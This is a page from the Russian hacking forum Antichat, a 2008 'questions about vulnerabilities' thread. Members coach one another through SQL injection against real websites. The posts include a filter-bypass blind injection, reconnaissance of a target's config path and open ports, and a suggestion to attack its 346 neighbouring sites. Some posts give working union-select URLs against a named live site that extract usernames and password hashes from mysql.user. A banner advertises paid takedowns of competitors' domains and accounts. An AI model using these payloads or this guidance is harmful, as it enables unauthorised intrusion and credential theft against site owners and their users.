Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 386 из 1393

386

Опции темы

Поиск в этой теме

Опции просмотра

#3851

26.11.2008, 10:55

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Салют народ =)
Прошу помощи.
Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden

Цитата:

Forbidden

You don't have permission to access /page/about_tema.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
__________________________________________________ __
Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

Поля подобрал верно стопудофф.
Ввожу
/page/about_tema.php?id=16+union+select+1,2,3,4,5,6--
и ппц.

Что это может быть и как бороться?

Последний раз редактировалось Imperou$; 26.11.2008 в 12:28..

#3852

26.11.2008, 11:16

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

Вы не имеете прав доступа к /page/about_tema.php. 403 - Запрещено!

#3853

26.11.2008, 11:22

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Я понимаю, что запрещено. Я спарашиваю почему, и как это обойти.
Ведь я могу обращаться к скрипту просто, и при подборе ордер бай тоже могу, всё выводит как надо, но при юнион селект вот такая фигня.

#3854

26.11.2008, 11:29

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

Отправить сообщение для Calcutta с помощью ICQ

читай личку. возможно поможет (-

#3855

26.11.2008, 11:40

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Спасибо. Помогло, практически. Но суть понял )
+

#3856

26.11.2008, 12:16

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Цитата:

Сообщение от Imperou$

Салют народ =)
Прошу помощи.
Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden

Поля подобрал верно стопудофф.
Ввожу
/page/about_tema.php?id=16+union+select+1,2,3,4,5,6--
и ппц.

Что это может быть и как бороться?

Там фильтры стоят на комбинации union select и прочее. Надо вот так:

Код:

http://www.site.com/pages/blog_historial.php?MUESBLOG=BLOG&VALOTEMA=107+AND+ascii(lower(substring(version(),1,1)))=53

стоит 5 версия мускула, можно при желании все вытянуть...

Код:

/home/site/public_html/

путь от корня к WWW
Можно просматривать содержимое каталога:

Код:

http://www.site.com/admin/includes/

Вот сдесь по всей видимости конфигурационные данные

Код:

http://www.site.com/admin/includes/configuracion.php

Система - линукс
Открытые порты: 21, 25, 26, 53, 80, 110, 143, 443, 465, 993, 995, 3306
Думаю самый вариант в твоем случае ломать соседние сайты, а их 346 =)

PS адресс сайта убрал по просьбе Imperou$

Последний раз редактировалось _Pantera_; 26.11.2008 в 13:19..

#3857

26.11.2008, 12:44

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Всем спасибо.
_Pantera_ в частности. Разобрался. Вопрос решён.

#3858

26.11.2008, 13:17

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

Цитата:

Сообщение от AHMED HASSAN

hi

sorry need to write in english

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13%20from%20mysql.user

i got all that and when user

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11 ,12,13%20from%20mysql.user

doesnt appear

how to move on

thanx

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11 ,12%20,13%20from%20mysql.user+limit+1,1

#3859

26.11.2008, 13:21

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

@AHMED HASSAN
the first record in the mysql.user table is empty, so start with the second one:
http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,concat(user,0x3a ,password),7,8,9,10,11,12%20,13%20from%20mysql.use r+limit+1,1

@zannussi
похоже на самописный двиг

Последний раз редактировалось [Raz0r]; 26.11.2008 в 13:26..

#3860

26.11.2008, 22:36

d1aVOL

Познающий

Регистрация: 29.07.2007

Сообщений: 49

Провел на форуме:
279583

Репутация: 7

можно ли как-нибудь кроме брута узнать названия столбцов/таблиц, если версия муслуля менше 5?

Страница 386 из 1393

386

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход